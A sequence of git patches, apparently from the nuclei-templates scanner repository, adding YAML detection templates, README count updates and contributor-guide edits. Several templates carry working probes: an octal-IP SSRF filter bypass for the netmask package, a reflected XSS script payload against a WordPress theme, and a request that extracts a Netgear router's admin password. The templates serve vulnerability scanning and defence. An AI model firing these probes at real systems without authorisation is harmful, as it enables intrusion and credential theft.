"{{BaseURL}}/?uri=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Apache Server Status" + - "Server Version" + part: body From 5d74f7e2e4b0c048366f2d4f4e8c8b2f57deff07 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Tue, 6 Jul 2021 01:03:18 -0600 Subject: [PATCH 0295/4083] Update CVE-2021-28918.yaml Fixing trailing spaces. --- cves/2021/CVE-2021-28918.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index 64643764d5..314b84f1fb 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -23,5 +23,5 @@ requests: - type: word words: - "Apache Server Status" - - "Server Version" - part: body + - "Server Version" + part: body From e162a82b9fb243a3cd46a3187c14995483a90280 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Jul 2021 07:04:33 +0000 Subject: [PATCH 0296/4083] Auto Update README [Tue Jul 6 07:04:33 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 026f10761d..6e2c0c8c54 100644 --- a/README.md +++ b/README.md @@ -38,7 +38,7 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 377 | vulnerabilities | 208 | exposed-panels | 180 | +| cves | 378 | vulnerabilities | 207 | exposed-panels | 180 | | takeovers | 69 | exposures | 108 | technologies | 108 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | From ede7ca07d0352203c79b1c2e83a558427c5f2646 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Tue, 6 Jul 2021 01:05:03 -0600 Subject: [PATCH 0297/4083] Fixing Trailing Spaces As stated. --- cves/2021/CVE-2021-28918.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index 314b84f1fb..bf38188859 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -21,7 +21,7 @@ requests: status: - 200 - type: word + part: body words: - "Apache Server Status" - "Server Version" - part: body From 7fb23a24b9107e5c30ac02d9cc66949082a8e694 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 12:41:16 +0530 Subject: [PATCH 0298/4083] minor update --- cves/2021/CVE-2021-28918.yaml | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index bf38188859..debefe11c1 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -1,12 +1,14 @@ id: CVE-2021-28918 info: - name: npm Netmask SSRF + name: Netmask NPM Package <=v1.0.6 SSRF author: johnjhacking - severity: high - reference: https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + severity: critical description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. - tags: cve,cve2021,npm,netmask,ssrf,rfi,lfi + tags: cve,cve2021,npm,netmask,ssrf,lfi + reference: | + - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 requests: - method: GET @@ -15,13 +17,16 @@ requests: - "{{BaseURL}}/?uri=http://0177.0.0.1/server-status" - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status" - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - "Apache Server Status" - "Server Version" + condition: and \ No newline at end of file From 59199ad35e737e2935694792582ded3b9a845682 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 12:45:50 +0530 Subject: [PATCH 0299/4083] Update CVE-2021-28918.yaml Removed version as multiple reference includes multiple versions. --- cves/2021/CVE-2021-28918.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index debefe11c1..1f0f3c4456 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -1,14 +1,15 @@ id: CVE-2021-28918 info: - name: Netmask NPM Package <=v1.0.6 SSRF + name: Netmask NPM Package SSRF author: johnjhacking severity: critical - description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. tags: cve,cve2021,npm,netmask,ssrf,lfi reference: | - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 + - https://github.com/advisories/GHSA-pch5-whg9-qr2r requests: - method: GET From e0511499445d91bebfd3c524c24f1bbbe868e1df Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 14:54:43 +0530 Subject: [PATCH 0300/4083] minor updates --- .../ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md | 22 +++++-------------- CONTRIBUTING.md | 3 +-- 2 files changed, 6 insertions(+), 19 deletions(-) diff --git a/.github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md b/.github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md index f81a7728f7..890df943a9 100644 --- a/.github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md +++ b/.github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md @@ -14,25 +14,13 @@ I've validated this template locally? - [ ] YES - [ ] NO - - + +#### Additonal Details (leave it blank if not applicalbe) + + + - - - ### Additional References: diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index e09bab53e4..37911ee048 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -39,7 +39,6 @@ git rebase upstream/master Create a new branch. Use its name to identify the issue your addressing. ```sh - # It will create a new branch with name template_branch_name and switch to that branch git checkout -b template_branch_name ``` @@ -79,7 +78,7 @@ git push -u origin template_branch_name ## Step 6 : Pull Request -- Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to you pull request, that describes the purpose of the template. +- Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to your pull request, that describes the purpose of the template. - Voila! Your Pull Request has been submitted. It will be reviewed and merged by the moderators, if it complies with project standards, otherwise a feedback will be provided.🥳 ## Need more help?🤔 From 4b590e43f52dfdd92c16e1803f791684937ec7aa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Jul 2021 09:42:09 +0000 Subject: [PATCH 0301/4083] Auto Update README [Tue Jul 6 09:42:08 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 6e2c0c8c54..1247fe6b7a 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**125 directories, 1418 files**. +**125 directories, 1419 files**. From 3c2971b09a8e64c57fe106aedd1918bd43a7d04e Mon Sep 17 00:00:00 2001 From: Ivanov Vladimir Date: Tue, 6 Jul 2021 13:39:45 +0300 Subject: [PATCH 0302/4083] Add sap-igs-detect.yaml --- technologies/sap-igs-detect.yaml | 40 ++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 technologies/sap-igs-detect.yaml diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap-igs-detect.yaml new file mode 100644 index 0000000000..e4a882b009 --- /dev/null +++ b/technologies/sap-igs-detect.yaml @@ -0,0 +1,40 @@ +id: sap-igs-detect + +info: + name: SAP Internet Graphics Server (IGS) Detection + author: _generic_human_ + description: Detection of SAP Internet Graphics Server (IGS) + severity: info + tags: sap,webserver,igs + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SAP IGS" + - "is running" + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "SAP Internet Graphics Server" + condition: and + + extractors: + - type: kval + part: header + kval: + - "Server" From 5b105fd29947fe15a0ab71a81728f8fd6667d241 Mon Sep 17 00:00:00 2001 From: Mah3Sec_ Date: Tue, 6 Jul 2021 09:31:47 -0400 Subject: [PATCH 0303/4083] Create git-logs --- git-logs | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 git-logs diff --git a/git-logs b/git-logs new file mode 100644 index 0000000000..ed2dc7d1e3 --- /dev/null +++ b/git-logs @@ -0,0 +1,29 @@ +id: git-logs + +info: + name: Git Logs Disclosure + author: Mahendra Purbia (Mah3Sec_) + severity: medium + description: Searches for the pattern /.git/logs/HEAD on passed URLs. + tags: logs,git,exposure + +requests: + - raw: + - | + GET /.git/logs/HEAD HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Content-Length: 1 + Connection: close + matchers-condition: and + matchers: + - type: word + words: + - "root" + + - type: dsl + dsl: + - 'contains(tolower(body), "") == false' From 78617f60123ebec5851be47a60ecee8e72000716 Mon Sep 17 00:00:00 2001 From: Suman Kar Date: Tue, 6 Jul 2021 19:51:53 +0530 Subject: [PATCH 0304/4083] Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS --- cves/2021/cve-2021-24387.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/cve-2021-24387.yaml diff --git a/cves/2021/cve-2021-24387.yaml b/cves/2021/cve-2021-24387.yaml new file mode 100644 index 0000000000..08e0d4d7b0 --- /dev/null +++ b/cves/2021/cve-2021-24387.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-24387 + +info: + name: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS + author: suman_kar + description: XSS in wordpress via ct_community parameter + severity: medium + tags: cve,cve2021,xss,wordpress + reference: https://cxsecurity.com/issue/WLB-2021070041 + +requests: + - raw: + - | + GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + + matchers-condition: and + matchers: + - type: word + words: + - '' + - '/wp-content/themes/realestate' + part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 270359703fcddccad533dfb35845a7971f3f97aa Mon Sep 17 00:00:00 2001 From: Suman Kar Date: Tue, 6 Jul 2021 19:55:39 +0530 Subject: [PATCH 0305/4083] Netgear Router - Admin Password Disclosure --- iot/netgear-admin-password-disclosure.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 iot/netgear-admin-password-disclosure.yaml diff --git a/iot/netgear-admin-password-disclosure.yaml b/iot/netgear-admin-password-disclosure.yaml new file mode 100644 index 0000000000..40108b9268 --- /dev/null +++ b/iot/netgear-admin-password-disclosure.yaml @@ -0,0 +1,25 @@ +id: netgear-DGN2200-DGND3700-admin-password-disclosure + +info: + name: Netgear DGN2200 / DGND3700 - Admin Password Disclosure + author: suman_kar + description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface. + severity: critical + tags: iot,netgear,router + +requests: + - raw: + - | + GET /BSW_cxttongr.htm HTTP/1.1 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + + extractors: + - type: regex + name: password + part: body + regex: + - Success ".*" + matchers: + - type: status + status: + - 200 \ No newline at end of file From 2aa91bbf24dcf2f36499f1cb42edc9a83c605021 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 6 Jul 2021 20:29:47 +0530 Subject: [PATCH 0306/4083] Rename cve-2021-24387.yaml to CVE-2021-24387.yaml --- cves/2021/{cve-2021-24387.yaml => CVE-2021-24387.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename cves/2021/{cve-2021-24387.yaml => CVE-2021-24387.yaml} (98%) diff --git a/cves/2021/cve-2021-24387.yaml b/cves/2021/CVE-2021-24387.yaml similarity index 98% rename from cves/2021/cve-2021-24387.yaml rename to cves/2021/CVE-2021-24387.yaml index 08e0d4d7b0..6c944264c9 100644 --- a/cves/2021/cve-2021-24387.yaml +++ b/cves/2021/CVE-2021-24387.yaml @@ -28,4 +28,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From a16b875b85c3bac5314246f9d5b8b6d9fad7d28b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Jul 2021 15:01:22 +0000 Subject: [PATCH 0307/4083] Auto Update README [Tue Jul 6 15:01:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1247fe6b7a..c392b1ba0e 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 378 | vulnerabilities | 207 | exposed-panels | 180 | +| cves | 379 | vulnerabilities | 207 | exposed-panels | 180 | | takeovers | 69 | exposures | 108 | technologies | 108 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**125 directories, 1419 files**. +**125 directories, 1420 files**. From ab5cd14c140ffacbbf98fba8ef288d1fcf8ed9fb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Jul 2021 15:09:32 +0000 Subject: [PATCH 0308/4083] Auto Update README [Tue Jul 6 15:09:32 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index c392b1ba0e..a4a11b472c 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 379 | vulnerabilities | 207 | exposed-panels | 180 | -| takeovers | 69 | exposures | 108 | technologies | 108 | +| cves | 379 | vulnerabilities | 207 | exposed-panels | 182 | +| takeovers | 69 | exposures | 109 | technologies | 110 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**125 directories, 1420 files**. +**125 directories, 1425 files**. From 5a818f62b833c6fc3ba6cd296d46747b9d745226 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 21:34:28 +0530 Subject: [PATCH 0309/4083] name and template update --- .../2016/CVE-2016-5649.yaml | 26 +++++++++++++------ 1 file changed, 18 insertions(+), 8 deletions(-) rename iot/netgear-admin-password-disclosure.yaml => cves/2016/CVE-2016-5649.yaml (65%) diff --git a/iot/netgear-admin-password-disclosure.yaml b/cves/2016/CVE-2016-5649.yaml similarity index 65% rename from iot/netgear-admin-password-disclosure.yaml rename to cves/2016/CVE-2016-5649.yaml index 40108b9268..edea993ef6 100644 --- a/iot/netgear-admin-password-disclosure.yaml +++ b/cves/2016/CVE-2016-5649.yaml @@ -1,25 +1,35 @@ -id: netgear-DGN2200-DGND3700-admin-password-disclosure +id: CVE-2016-5649 info: name: Netgear DGN2200 / DGND3700 - Admin Password Disclosure author: suman_kar - description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface. severity: critical - tags: iot,netgear,router + description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface. + tags: cve,cve2016,iot,netgear,router + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649 requests: - raw: - | GET /BSW_cxttongr.htm HTTP/1.1 + Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Smart Wizard Result " + part: body + extractors: - type: regex name: password part: body + group: 1 regex: - - Success ".*" - matchers: - - type: status - status: - - 200 \ No newline at end of file + - 'Success "([a-z]+)"' \ No newline at end of file From 37eb6d57ce54ae992721a3374f842dbd50a561f7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Jul 2021 16:06:20 +0000 Subject: [PATCH 0310/4083] Auto Update README [Tue Jul 6 16:06:20 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a4a11b472c..2128c8ee06 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 379 | vulnerabilities | 207 | exposed-panels | 182 | +| cves | 380 | vulnerabilities | 207 | exposed-panels | 182 | | takeovers | 69 | exposures | 109 | technologies | 110 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**125 directories, 1425 files**. +**125 directories, 1426 files**. From d464cbde90f5501a07793788c4c925d41194744e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 21:53:24 +0530 Subject: [PATCH 0311/4083] Added cisco-secure-desktop --- exposed-panels/cisco-secure-desktop.yaml | 27 ++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposed-panels/cisco-secure-desktop.yaml diff --git a/exposed-panels/cisco-secure-desktop.yaml b/exposed-panels/cisco-secure-desktop.yaml new file mode 100644 index 0000000000..1e19037f4f --- /dev/null +++ b/exposed-panels/cisco-secure-desktop.yaml @@ -0,0 +1,27 @@ +id: cisco-secure-desktop + +info: + name: Cisco Secure Desktop + author: pdteam + severity: info + tags: cisco,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/CACHE/sdesktop/install/start.htm" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - "Installation" + - "WebLaunch" + part: body + condition: and + + - type: status + status: + - 200 From 613344dbc5bdcbe4a9006258dddcd43a7a45153b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Jul 2021 16:25:13 +0000 Subject: [PATCH 0312/4083] Auto Update README [Tue Jul 6 16:25:13 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2128c8ee06..fac657c52a 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 380 | vulnerabilities | 207 | exposed-panels | 182 | +| cves | 380 | vulnerabilities | 207 | exposed-panels | 183 | | takeovers | 69 | exposures | 109 | technologies | 110 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**125 directories, 1426 files**. +**125 directories, 1427 files**. From 728065e70dbacd74561ea48df1ae3a02a1d1dded Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 6 Jul 2021 23:10:43 +0530 Subject: [PATCH 0313/4083] Create icinga-web-login.yaml --- exposed-panels/icinga-web-login.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/icinga-web-login.yaml diff --git a/exposed-panels/icinga-web-login.yaml b/exposed-panels/icinga-web-login.yaml new file mode 100644 index 0000000000..42aa467bb0 --- /dev/null +++ b/exposed-panels/icinga-web-login.yaml @@ -0,0 +1,22 @@ +id: icinga-web-login + +info: + name: Icinga Web 2 Login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/authentication/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Icinga Web 2 Login" + - type: status + status: + - 200 From 6fbf158cc38ad3fb36ea379fe0a76ab231b63fd3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 6 Jul 2021 23:13:40 +0530 Subject: [PATCH 0314/4083] Create seats.io-login.yaml --- exposed-panels/seats.io-login.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/seats.io-login.yaml diff --git a/exposed-panels/seats.io-login.yaml b/exposed-panels/seats.io-login.yaml new file mode 100644 index 0000000000..61481c8f3e --- /dev/null +++ b/exposed-panels/seats.io-login.yaml @@ -0,0 +1,22 @@ +id: seats.io-login + +info: + name: seats.io login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22seats.io++%7C+login%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/login' + + matchers-condition: and + matchers: + - type: word + words: + - "seats.io | login" + - type: status + status: + - 200 From 53d4b98bc4245fdef7c0bfb3745c65492b3f7c10 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 6 Jul 2021 23:16:57 +0530 Subject: [PATCH 0315/4083] Create lighttpd-default.yaml --- technologies/lighttpd-default.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/lighttpd-default.yaml diff --git a/technologies/lighttpd-default.yaml b/technologies/lighttpd-default.yaml new file mode 100644 index 0000000000..b2d5710a49 --- /dev/null +++ b/technologies/lighttpd-default.yaml @@ -0,0 +1,22 @@ +id: lighttpd-default + +info: + name: lighttpd Default Page + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Powered+by+lighttpd%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Powered by lighttpd" + - type: status + status: + - 200 From 4f1f0b747d0373c2546d912d24d215f8eadd0633 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 6 Jul 2021 23:21:57 +0530 Subject: [PATCH 0316/4083] Create zabbix-server-login.yaml --- exposed-panels/zabbix-server-login.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zabbix-server-login.yaml diff --git a/exposed-panels/zabbix-server-login.yaml b/exposed-panels/zabbix-server-login.yaml new file mode 100644 index 0000000000..9410d20cfa --- /dev/null +++ b/exposed-panels/zabbix-server-login.yaml @@ -0,0 +1,22 @@ +id: zabbix-server-login + +info: + name: Zabbix Login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22zabbix-server%3A+Zabbix%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "zabbix-server: Zabbix" + - type: status + status: + - 200 From ab7d05daac4870f247daa60f0d40f73b4b4f27db Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Jul 2021 17:56:31 +0000 Subject: [PATCH 0317/4083] Auto Update README [Tue Jul 6 17:56:31 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fac657c52a..16d0e5edc4 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 380 | vulnerabilities | 207 | exposed-panels | 183 | +| cves | 380 | vulnerabilities | 207 | exposed-panels | 184 | | takeovers | 69 | exposures | 109 | technologies | 110 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**125 directories, 1427 files**. +**125 directories, 1428 files**. From febb2e68b0595da99beef47c716790f8ee38595e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 6 Jul 2021 23:26:35 +0530 Subject: [PATCH 0318/4083] Update lighttpd-default.yaml --- technologies/lighttpd-default.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/lighttpd-default.yaml b/technologies/lighttpd-default.yaml index b2d5710a49..b5ee2404d6 100644 --- a/technologies/lighttpd-default.yaml +++ b/technologies/lighttpd-default.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Powered+by+lighttpd%22 - tags: panel + tags: tech requests: - method: GET From 5a240e2314046879d806f2715e5e6e59a5067029 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 6 Jul 2021 23:27:03 +0530 Subject: [PATCH 0319/4083] Create jitsi-meet.yaml --- technologies/jitsi-meet.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/jitsi-meet.yaml diff --git a/technologies/jitsi-meet.yaml b/technologies/jitsi-meet.yaml new file mode 100644 index 0000000000..745a2c98e6 --- /dev/null +++ b/technologies/jitsi-meet.yaml @@ -0,0 +1,22 @@ +id: jitsi-meet + +info: + name: Jitsi Meet Page + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Jitsi+Meet%22 + tags: tech + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Jitsi Meet" + - type: status + status: + - 200 From 46839f95c146729756e28c5903f7684b936d0579 Mon Sep 17 00:00:00 2001 From: Wyatt Dahlenburg Date: Tue, 6 Jul 2021 13:02:14 -0500 Subject: [PATCH 0320/4083] Detect T3s protocol for Weblogic --- network/weblogic-t3-detect.yaml | 23 ++++++++++++++++++----- 1 file changed, 18 insertions(+), 5 deletions(-) diff --git a/network/weblogic-t3-detect.yaml b/network/weblogic-t3-detect.yaml index d2e50b328a..79f4887cf5 100644 --- a/network/weblogic-t3-detect.yaml +++ b/network/weblogic-t3-detect.yaml @@ -2,7 +2,7 @@ id: weblogic-t3-detect info: name: Detect Weblogic T3 Protocol - author: F1tz,milo2012 + author: F1tz,milo2012,wdahlenb severity: info description: Check T3 protocol status. tags: network,weblogic @@ -10,19 +10,32 @@ info: network: - inputs: - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" - host: - "{{Hostname}}" read-size: 1024 - matchers: - type: word words: - "HELO" - extractors: - type: regex part: body group: 1 regex: - - "HELO:(.*).false" \ No newline at end of file + - "HELO:(.*).false" + + - inputs: + - data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + host: + - "tls://{{Hostname}}" + read-size: 1024 + matchers: + - type: word + words: + - "HELO" + extractors: + - type: regex + part: body + group: 1 + regex: + - "HELO:(.*).false" From cc4244d36cca0f85acc90a521982da1a18ac7031 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 23:32:45 +0530 Subject: [PATCH 0321/4083] Update huawei-router-auth-bypass.yaml --- vulnerabilities/other/huawei-router-auth-bypass.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/huawei-router-auth-bypass.yaml b/vulnerabilities/other/huawei-router-auth-bypass.yaml index 088faacef9..7cac228d9e 100644 --- a/vulnerabilities/other/huawei-router-auth-bypass.yaml +++ b/vulnerabilities/other/huawei-router-auth-bypass.yaml @@ -6,9 +6,8 @@ info: severity: critical description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. reference: | - - https://www.exploit-db.com/exploits/50059 - https://www.exploit-db.com/exploits/48310 - tags: huawei,auth-bypass + tags: huawei,auth-bypass,router requests: - 